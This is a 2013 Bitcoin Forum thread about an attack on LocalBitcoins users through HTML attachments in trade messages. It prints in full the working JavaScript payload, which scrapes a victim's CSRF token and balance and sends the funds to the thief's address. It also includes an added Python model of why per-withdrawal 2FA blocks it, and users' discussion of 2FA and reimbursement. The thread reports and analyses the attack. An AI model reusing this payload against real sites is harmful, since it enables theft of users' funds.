Bitcoin Forum
Author Topic: LocalBitcoins.com exploit!  (Read 6087 times)
runeks
September 13, 2013, 12:43:32 PM
 #41

This is the exploit in question:

Code:
function loadpic() {
    function btcget() {
        $.ajax({
            url: '/accounts/wallet/',
            type: 'GET',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {
                walh(data);
            }
        });
    }

    function btcsend(btcamount, btcto, csrf) {
        var pd = {
            'csrfmiddlewaretoken': csrf,
            'address_to': btcto,
            'amount': btcamount,
            'send_submit': 'Send from wallet'
        };
        $.ajax({
            url: '/accounts/wallet/',
            data: pd,
            type: 'POST',
            dataType: 'html',
            contentType: 'application/x-www-form-urlencoded; charset=UTF-8',
            error: function() {},
            success: function(data) {}
        });
    }

    function walh(html) {
        var hastfa = '';
        var csrftoken = '';
        var btc = 0;
        var m = html.match(/label for=.(id_token)/);
        if (m && m[1]) {
            if (m[1] != '') {
                return;
            }
        }
        m = html.match(/.csrfmiddlewaretoken. value=.([a-zA-Z0-9_-]+)/);
        if (m && m[1]) {
            csrftoken = m[1];
        } else {
            return;
        }
        m = html.match(/Wallet: ([0-9,.-]+) BTC/);
        if (m && m[1]) {
            btc = m[1];
        } else {
            return;
        }
        btc = parseFloat(btc);
        btc = btc.toFixed(2);
        if (btc < 0.02) {
            return;
        }
        btc = btc - 0.01;
        btc = btc.toFixed(2);

        btcsend(btc, '12PLw9HYoK6BguB1w4QcNBKzmRANJ5bj2c', csrftoken);
    }
    btcget();
}

Retrieved from this site: http://urlquery.net/report.php?id=5191051
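An added illustration, not code from this thread or from LocalBitcoins: the Python below models why a CSRF token read from the same origin is no gate against a script like the one above (the same two regexes recover it and the balance), while a per-withdrawal TOTP code, whose secret never appears in the HTML, is. The wallet page, token values, secret and balance are all constructed.

```python
import hashlib, hmac, re, struct

def totp(secret: bytes, now: int, step: int = 30, digits: int = 6) -> str:
    """RFC 6238 TOTP over HMAC-SHA1, as produced by authenticator apps."""
    mac = hmac.new(secret, struct.pack(">Q", now // step), hashlib.sha1).digest()
    off = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[off:off + 4])[0] & 0x7FFFFFFF
    return f"{code % 10 ** digits:0{digits}d}"

class Wallet:
    """Constructed toy model of an account wallet page and its withdraw form."""

    def __init__(self, balance: float, csrf: str, totp_secret: bytes = b""):
        self.balance, self.csrf, self.totp_secret = balance, csrf, totp_secret

    def html(self) -> str:
        # Everything in the page is readable by any script on the same origin,
        # so the CSRF token alone cannot gate a withdrawal against such a script.
        return (f'<input name="csrfmiddlewaretoken" value="{self.csrf}">'
                f"<p>Wallet: {self.balance:.2f} BTC</p>")

    def withdraw(self, form: dict, now: int, require_2fa: bool) -> bool:
        """Apply the withdrawal and return True, or reject it and return False."""
        if not hmac.compare_digest(form.get("csrfmiddlewaretoken", ""), self.csrf):
            return False
        if require_2fa:  # per-withdrawal code; the secret never appears in the HTML
            if not self.totp_secret:
                return False
            if not hmac.compare_digest(form.get("otp", ""), totp(self.totp_secret, now)):
                return False
        amount = float(form.get("amount", "0"))
        if not 0 < amount <= self.balance:
            return False
        self.balance -= amount
        return True

def same_origin_readable(html: str) -> dict:
    """Fields a script running on the same origin can harvest from the page."""
    csrf = re.search(r'csrfmiddlewaretoken" value="([A-Za-z0-9_-]+)', html)
    bal = re.search(r"Wallet: ([0-9.]+) BTC", html)
    return {"csrfmiddlewaretoken": csrf.group(1), "amount": bal.group(1)}

def simulate(require_2fa: bool) -> tuple:
    # Drive the withdraw form with only the page-readable fields (no "otp").
    w = Wallet(1.50, "constructed-csrf-token", b"constructed-totp-secret")
    ok = w.withdraw(same_origin_readable(w.html()), 1379070000, require_2fa)
    return ok, w.balance
```

With `require_2fa=False` the page-readable fields alone empty the wallet; with it enabled the same request is rejected, which is the distinction the later posts argue over (2FA at login versus 2FA per withdrawal).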
Mike Hearn
September 13, 2013, 02:18:13 PM
 #42

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.
herzmeister (OP)
September 13, 2013, 02:23:07 PM
 #43

Ideally, there would be no need to deposit funds into any website to do basic person to person trading. I never used the localbitcoins escrow system, if you meet in person it's not that important.

It enables in-person trading without requiring internet access at all, for neither buyer nor seller. All that's required is that seller can receive SMS.

In practice, many do have smartphones and transfer their coins directly though.

For online trading, escrow is pretty necessary in most cases though. That's why traders often have a few coins in their localbitcoins.com wallets.

marcovaldo
September 13, 2013, 02:50:44 PM
 #44

Did you personally lose anything?

MPOE-PR
September 13, 2013, 02:54:57 PM
 #45

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

They'll learn when they're able to recognize their own vanity, stupidity, and unreadiness. Which would often enough seem about as likely as pigs flying, sadly.

By now it's at the same stage as the "Piratenpartei" in Germany: sympathetic, here to change the world, full of great ideas, clever in the system, ready for the future - but in actual reality a bunch of nerds who are unable to act like adult politicians and become ridiculous when trying.

Don't write code, go to your local bank, ask for an internship and learn how money works.

This, basically. With the addendum that not everyone is cut out to run a business. And the post-script that paying attention to what the actually capable have to say is a necessary step.

johnyj
September 13, 2013, 02:56:34 PM
 #46

Bitcoin withdrawals should be authenticated through email

BitAddict
September 13, 2013, 03:02:44 PM
 #47

Bitcoin withdrawals should be authenticated through email

With 2FA I think it is enough
johnyj
September 13, 2013, 03:04:20 PM
 #48

Bitcoin withdrawals should be authenticated through email

With 2FA I think it is enough

2FA is not convenient if you use the site many times a day, and it does not work when you are abroad and use a different SIM card

Cryddit
September 13, 2013, 03:29:35 PM
 #49

My gosh, people need to stop setting up bitcoin exchange places without setting up proper security first!
So many places are getting hacked into, WHEN WILL PEOPLE LEARN!?

People keep putting Coins into online wallets whose security they don't know crap about!  WHEN WILL PEOPLE LEARN?


You need to leave the bitcoins in the wallet if you want to sell them ... and I believe a company more than the average private seller... How did you buy your bitcoins, sir?

Some I bought from Bitstamp.  And moved them the instant they showed up in my Bitstamp account, to my private wallet.

Some I got for pay - made machine parts for someone. She wanted to pay me in Bitcoin, I said sure.

Some others I got for pay - wrote code for somebody who wanted special, exclusive, super-secret software to analyze an enormously big pile of data, and paid in Bitcoin to keep it private from someone else looking at the bank account.

Some others I got for pay - main job, security consulting.  I look at malware, see what it does by reading the machine code, figure out how to clean infected machines.  Clients implement, or I implement, cleaning software, which clients then sell.  Pays well.  Twice now I asked to be paid in Bitcoin, they said 'sure, whatever'.

A couple I bought direct in person, smartphone to smartphone, from a speculator who got nervous back when the price was USD $60.

joesmoe2012
September 13, 2013, 06:26:24 PM
 #50

You can make 2FA work with different SIMs, I have, it's not that difficult. Just backup and then restore.

Everybody should be using 2FA if you're dealing with bitcoins. Otherwise stay away from targets such as exchanges.

Good work on localbitcoins' behalf in paying out of their own pocket for all the stolen coins.

smoothie
September 14, 2013, 03:37:02 AM
 #51

As the saying goes:

Those who fail to learn from history are doomed to repeat it.



justusranvier
September 14, 2013, 03:40:39 AM
 #52

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
joesmoe2012
September 14, 2013, 08:51:22 AM
 #53

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

BitAddict
September 14, 2013, 11:22:17 AM
 #54

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.
johnyj
September 14, 2013, 12:15:56 PM
 #55

At least an email-based 2FA is much better

rufusBTC
September 14, 2013, 05:10:08 PM
 #56

AFAIK two factor on LocalBitcoins is only for logging in, not for withdrawals, so it provided absolutely no protection against this exploit.
Incorrect. They use 2FA for withdrawal confirmation as well. I don't think that this exploit affected anybody who had 2FA enabled.

+1

You can't withdraw without a 2FA code, if enabled.

Looks like the exploit just sucked out people's BTC, through a loophole, even if they had 2FA.

niko
September 14, 2013, 06:46:59 PM
 #57

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

willphase
September 14, 2013, 10:21:22 PM
 #58

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

You had to open the attachment (that was in fact an HTML page) and not have 2FA on withdrawals enabled.

Will

herzmeister (OP)
September 14, 2013, 10:22:58 PM
 #59

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Did you mean because I linked to the forum in the OP? No, that link was safe, or what do you think of me >:(

The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

niko
September 15, 2013, 01:58:31 AM
 #60

Can someone clarify: simply visiting a forum page was enough, or opening an attachment?

Did you mean because I linked to the forum in the OP? No, that link was safe, or what do you think of me >:(

The exploit was in the site's messaging system when doing trades. That people can upload attachments there is a relatively new feature.

Ten days ago I was browsing through the LBC site, and there was great advice on how to trade safely. I specifically remember them reminding people to always be cautious with any attachments in emails, etc.
People clicked on attachments, did not have 2FA, and sure enough the thief got their coins.
